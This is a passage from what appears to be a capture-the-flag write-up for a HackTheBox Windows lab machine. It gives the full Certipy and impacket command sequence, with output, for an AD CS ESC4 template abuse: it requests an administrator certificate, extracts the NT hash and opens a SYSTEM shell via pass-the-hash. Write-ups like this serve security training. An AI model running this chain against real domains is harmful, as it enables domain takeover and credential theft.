All Extended Rights : NT AUTHORITY\Authenticated UsersS-1-5-11
Object Control Permissions
Owner : SEQUEL\Enterprise Admins S-1-5-21-548670397-972687484-3496335370-519
Full Control Principals : NT AUTHORITY\Authenticated UsersS-1-5-11
WriteOwner Principals : NT AUTHORITY\Authenticated UsersS-1-5-11
WriteDacl Principals : NT AUTHORITY\Authenticated UsersS-1-5-11
WriteProperty Principals : NT AUTHORITY\Authenticated UsersS-1-5-11
Certify completed in 00:00:07.2625288sh
certipy find -u 'CA_SVC@certified.htb' -p 'ThisIsStrong123!..' -dc-ip 10.10.11.51 -vulnerable -enablesh
certipy find -u 'CA_SVC@certified.htb' -p 'ThisIsStrong123!..' -dc-ip 10.10.11.51 -vulnerable -enable
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[*] Got CA configuration for 'sequel-DC01-CA'
[*] Saved BloodHound data to '20250113182419_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20250113182419_Certipy.txt'
[*] Saved JSON output to '20250113182419_Certipy.json'json
cat 20250113182419_Certipy.json
{
"Certificate Authorities": {
"0": {
"CA Name": "sequel-DC01-CA",
"DNS Name": "DC01.sequel.htb",
"Certificate Subject": "CN=sequel-DC01-CA, DC=sequel, DC=htb",
"Certificate Serial Number": "152DBD2D8E9C079742C0F3BFF2A211D3",
"Certificate Validity Start": "2024-06-08 16:50:40+00:00",
"Certificate Validity End": "2124-06-08 17:00:40+00:00",
"Web Enrollment": "Disabled",
"User Specified SAN": "Disabled",
"Request Disposition": "Issue",
"Enforce Encryption for Requests": "Enabled",
"Permissions": {
"Owner": "SEQUEL.HTB\\Administrators",
"Access Rights": {
"2": [
"SEQUEL.HTB\\Administrators",
"SEQUEL.HTB\\Domain Admins",
"SEQUEL.HTB\\Enterprise Admins"
],
"1": [
"SEQUEL.HTB\\Administrators",
"SEQUEL.HTB\\Domain Admins",
"SEQUEL.HTB\\Enterprise Admins"
],
"512": [
"SEQUEL.HTB\\Authenticated Users"
]
}
}
}
},
"Certificate Templates": {
"0": {
"Template Name": "DunderMifflinAuthentication",
"Display Name": "Dunder Mifflin Authentication",
"Certificate Authorities": [
"sequel-DC01-CA"
],
"Enabled": true,
"Client Authentication": true,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": false,
"Certificate Name Flag": [
"SubjectRequireCommonName",
"SubjectAltRequireDns"
],
"Enrollment Flag": [
"AutoEnrollment",
"PublishToDs"
],
"Private Key Flag": [
"16777216",
"65536"
],
"Extended Key Usage": [
"Client Authentication",
"Server Authentication"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "1000 years",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 2048,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"SEQUEL.HTB\\Domain Admins",
"SEQUEL.HTB\\Enterprise Admins"
]
},
"Object Control Permissions": {
"Owner": "SEQUEL.HTB\\Enterprise Admins",
"Full Control Principals": [
"SEQUEL.HTB\\Cert Publishers"
],
"Write Owner Principals": [
"SEQUEL.HTB\\Domain Admins",
"SEQUEL.HTB\\Enterprise Admins",
"SEQUEL.HTB\\Administrator",
"SEQUEL.HTB\\Cert Publishers"
],
"Write Dacl Principals": [
"SEQUEL.HTB\\Domain Admins",
"SEQUEL.HTB\\Enterprise Admins",
"SEQUEL.HTB\\Administrator",
"SEQUEL.HTB\\Cert Publishers"
],
"Write Property Principals": [
"SEQUEL.HTB\\Domain Admins",
"SEQUEL.HTB\\Enterprise Admins",
"SEQUEL.HTB\\Administrator",
"SEQUEL.HTB\\Cert Publishers"
]
}
},
"[!] Vulnerabilities": {
"ESC4": "'SEQUEL.HTB\\\\Cert Publishers' has dangerous permissions"
}
}
}
} ESC4 attack
- https://github.com/ly4k/Certipy?tab=readme-ov-file#esc4
- https://www.thehacker.recipes/ad/movement/adcs/#escalation-techniques
sh
certipy template -u "CA_SVC@certified.htb" -p 'ThisIsStrong123!..' -dc-ip "10.10.11.51" -template DunderMifflinAuthentication -save-oldsh
certipy req -u "CA_SVC@certified.htb" -p 'ThisIsStrong123!..' -target "sequel-DC01-CA" -ca 'sequel-DC01-CA' -template 'DunderMifflinAuthentication' -upn 'administrator@sequel.htb' -dns 'sequel.htb'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 32
[*] Got certificate with multiple identifications
UPN: 'administrator@sequel.htb'
DNS Host Name: 'sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator_sequel.pfx'sh
certipy auth -pfx administrator_sequel.pfx -domain sequel.htb -username administrator -dc-ip 10.10.11.51
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Found multiple identifications in certificate
[*] Please select one:
[0] UPN: 'administrator@sequel.htb'
[1] DNS Host Name: 'sequel.htb'
> 0
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435...:7a8d4e04...sh
impacket-psexec administrator@10.10.11.51 -hashes :7a8d4e04...
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.10.11.51.....
[-] share 'Accounting Department' is not writable.
[*] Found writable share ADMIN$
[*] Uploading file rbVFTkrw.exe
[*] Opening SVCManager on 10.10.11.51.....
[*] Creating service iDeD on 10.10.11.51.....
[*] Starting service iDeD.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.6640]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\systemsh
C:\Users\Administrator\Desktop> type root.txt
767cb01d...Up next
EasyJan 2025
HTB — Sea
WonderCMS CVE-2023-41425 XSS to RCE via theme upload. Credential reuse for lateral movement. Port-forwarded internal tool for command injection privesc.
Read writeup
EasyJan 2025
HTB — Remote
Umbraco CMS with anonymous NFS mount exposing credentials. Authenticated SXSS/RCE via template. TeamViewer 7 password decryption for SYSTEM.
Read writeup
MediumJan 2025
HTB — Mentor
SNMP v3 credential brute-force yields API secret. Command injection in backup API endpoint. PostgreSQL password enables lateral movement and sudo root.
Read writeup